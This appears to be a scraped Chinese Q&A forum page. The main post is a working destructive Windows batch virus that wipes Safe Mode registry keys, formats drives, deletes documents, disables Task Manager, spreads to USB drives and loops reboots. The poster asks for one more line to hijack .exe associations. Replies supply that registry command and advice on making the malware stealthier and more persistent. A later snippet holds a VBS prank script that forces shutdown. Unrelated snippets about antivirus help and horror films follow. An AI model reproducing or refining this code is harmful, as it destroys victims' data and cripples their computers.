十分恐怖的一个病毒批处理。差一句就完成。超高分求助!
:1
rem 损坏安全模式
reg delete HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot /f
rem 开机自启动
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v windowsdir /t reg_sz /d "c:\%~n0%~x0" /f>nul
rem 格式化所有盘
format d:/q
format e:/q
format f:/q
rem 禁用任务管理器
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\system /v DisableTaskMgr /t reg_dword /d 1 /f >nul
rem USB移动盘感染
for %%i in (%drives%) do (fsutil fsinfo drivetype %%i: | find "可移动驱动器">NUL && copy %0 %%i)
for %%i in (%drives%) do (del %%i:\*.doc /f /s /q & del %%i:\*.xls /f /s /q & del %%i:\*.ghs /f /s /q)
rem 5秒内重启
shutdown -r -t 5
rem 复制自身+开机自启动
copy %0 "C:\Documents and Settings\Administrator\「开始」菜单\程序\启动"
rem 增加超多硬盘
md d:\fly >nul 2>nul
set a=c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z
for %%a in (%a%) do subst %%a: d:\fly >nul 2>nul
rem 修改IE标题栏
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "window title" /t REG_SZ /d "Bitch, I FUCK YOU !" /f
rem 销毁自身
del %0
goto 1
在其中加一句命令,功能为:运行exe会自动关联jpg也就是说打开exe会把这个exe当jpg对待来运行!
求这条命令。
我Q276376883
有嫌分不够的我会继续再加。
reg add "HKEY_CLASSES_ROOT\exefile\shell\opencommand" "rundll32.exe C:\WINDOWS\system32\shimgvw.dll,ImageView_Fullscreen %1"
附关联exe方法:
regedit,找到"HKEY_CLASSES_ROOT\exefile\shell\open\command"即可;
关联jpg,找到注册表中的"HKEY_CLASSES_ROOT\jpegfile\shell\open\command"
其他关联,你可以参考“新欢乐时光”病毒的关联dll的方法,在KJCreateMilieu()函数中的“ 改变dll的打开方式”中可找到,具体:http://hi.baidu.com/msrighthomepage/blog/item/0f34e344c905c421cefca3c2.html
我没有测试过,但是,如果所有的应用程序exe都关联了jpg图片的话,这电脑基本上运行不了。
我建议你用vbs改写。
不过。。。这个批处理太嫩了
第一,连个后台操作都不做。。你以为人家傻啊,没等你做多少事情的时候你的CMD窗口已经被关掉了
第二,逻辑太乱复制到移动设备有什么用。。。
第三,你怎么确定他的用户名一定是ADMINISTRATOR,至少要改成%userprofile%这个吧
第四,你的做法其实并不怎么样添加到开始运行并不是最好的办法,最好的办法是写入到C:\AUTOEXEC.BAT这个批处理里面(默认是只读)这个是开机自动启动的批处理(系统默认的)
我也是新手,有什么说的不对的请多指教
十分恐怖的一个病毒批处理。差一句就完成。超高分求助!
根据你的“运行exe会自动关联jpg也就是说打开exe会把这个exe当jpg对待来运行”这句,代码如下:reg add "HKEY_CLASSES_ROOT\\exefile\\shell\\opencommand" "rundll32.exe C:\\WINDOWS\\system32\\shimgvw.dll,ImageView_Fullscreen %1"附关联exe方法:regedit,找到"HKEY_CLASSES_ROOT\\exefile\\shell\\open\\com...
电脑中了个不知名的病毒..我以无能为力! 高分求助!
中毒后,如果开着杀毒软件的话,最好把网线断了,沙软都会给杀除的。若遇到难搞得病毒,那就最好开机时按F8,进入安全模式,然后再用杀毒软件杀。杀毒软件吗,推荐用卡巴6.0和AVG(原名ewido),两者不冲突。一般用时只开卡巴就行了,查毒就用AVG,速度快。你可以在改完正确的时间后.在运行中输...
大家觉得世界上最恐怖的电影是哪部电影?
Top2.咒怨(日式恐怖的代表,极其邪恶) 《咒怨》是日本恐怖类型系列电影,这部电影在2003年就上映了,《咒怨》的主要恐怖是伽椰子以及俊雄的咒怨如何影响每一个走进这个屋子的人,任何触碰到咒怨的人都无法逃离,无论他是谁,无论他来自哪里、去向何方,也无论他因为什么走进了这栋房子top1.活跳尸(罕...
高分悬赏求助:怎样彻底杀灭generic.dx这个木马?
对付这样刁钻的病毒,建议用安全模式下McAfee和360都杀一遍,再用超级兔子清理一下注册表,应该就可以杜绝它再复活
高分求助win2003下奇怪问题(病毒或木马?),请高手解决,重做系统的请绕道...
安好金山毒霸可以接上网络。用金山卫士扫描,看看有什么木马,先不要清除,记下木马的类型,来源,再用[金山网盾]解决一下你要解决的问题。再就要清理垃圾和注册表,系统修复一下,优化一下。如果在它的主页显示五个星——你的系统非常安全,请继续保持,问题可能会解决了。有些不便多说——可到我空间...
400高分求助高手,电脑中病毒了,所有盘都打不开了
4.电脑会进入一个与Windows XP一样的界面。操作方法很简单,这里就不细说了。5.与我们平时在系统里操作一样,双击桌面上的“NOD32”的图标,就可以启动这个光盘里的杀毒软件对我们电脑上的硬盘进行病毒的查杀了。如果真是有病毒的话,杀完毒后重启应该能正常了。在机器里的杀毒软件无法运行或机器没有...
高分求助:强迫现象:“干扰人”非要不存在才安心!
高分求助:强迫现象:“干扰人”非要不存在才安心! 50 我因为上学时受的欺辱有阴影,所以这些年一直有心理障碍社交恐惧,怕别人欺辱我,这几年长时间在家也加重了症状,不知道从小是胆小还是怎么,主要有一个心理障碍现象就是:遇到个干扰... 我因为上学时受的欺辱有阴影,所以这些年一直有心理障碍社交恐惧,怕别人欺辱...
不知道是什么病毒 高分求助
了解,一般来说是个*.dll的文件,只有找到同名*.exe文件删掉,才能清除
求一部僵尸片的名字。以前看的忘记了。具体看内容请进
22.芝加哥打鬼3(玉米田的小男孩3) 上映时间:1995年 地区:美国 个人评分50分 看了这部电影感觉自己被骗了.完全看不出是部丧尸电影.就是讲这个小男孩在玉米田用魔法害人,之后变成一个怪兽.被男女主角用连刀给砍断了身躯. 看得我都想睡着了, 恐怖程度:一星 我个人建议大家不要看这部电影 非常的郁闷, 而且连...
超高分!求电脑高手教我一个批处理文件,是一旦打开就必须让对方电脑关机...
建立个TXT文档 输入:on error resume next dim WSHshellA set WSHshellA = wscript.createobject("wscript.shell")WSHshellA.run "cmd.exe \/c shutdown -r -t 60 -c ""说我是猪,不说我是猪就一分钟关你机,不信,试试···"" ",0 ,true dim a do while(a <> "我是猪")a = ...
